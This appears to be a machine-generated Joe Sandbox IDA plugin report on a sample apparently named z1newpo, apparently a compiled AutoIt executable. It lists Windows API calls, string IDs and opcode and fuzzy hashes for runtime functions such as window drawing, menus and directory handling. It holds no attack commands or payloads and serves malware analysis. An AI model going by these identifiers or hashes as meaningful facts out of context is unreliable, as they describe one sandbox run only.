                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                    • String ID:
                                                    • API String ID: 1744303182-0
                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                    • __mtterm.LIBCMT ref: 00417C34
                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 4163708885-3819984048
                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                    • API String ID: 0-1896584978
                                                    • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                    • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2485277191-404129466
                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                    APIs
                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00464B28
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                    • _wcslen.LIBCMT ref: 00464C28
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                    • String ID: D
                                                    • API String ID: 1914653954-2746444292
                                                    • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                    • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 0045CE39
                                                    • __wsplitpath.LIBCMT ref: 0045CE78
                                                    • _wcscat.LIBCMT ref: 0045CE8B
                                                    • _wcscat.LIBCMT ref: 0045CE9E
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                    • _wcscpy.LIBCMT ref: 0045CF61
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                    • String ID: *.*
                                                    • API String ID: 1153243558-438819550
                                                    • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                    • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                    • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                    • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll
                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                    • API String ID: 3832890014-4202584635
                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                    APIs
                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                    • GetFocus.USER32 ref: 0046A0DD
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$CtrlFocus
                                                    • String ID: 0
                                                    • API String ID: 1534620443-4108050209
                                                    • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                    • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateDestroy
                                                    • String ID: ,$tooltips_class32
                                                    • API String ID: 1109047481-3856767331
                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID: 0
                                                    • API String ID: 1441871840-4108050209
                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 3631882475-2268648507
                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                    • SendMessageW.USER32 ref: 00471740
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                    • SendMessageW.USER32 ref: 0047184F
                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 4116747274-0
                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                    • _wcslen.LIBCMT ref: 00461683
                                                    • __swprintf.LIBCMT ref: 00461721
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                    • GetParent.USER32(?), ref: 004618C3
                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                    • String ID: %s%u
                                                    • API String ID: 1899580136-679674701
                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
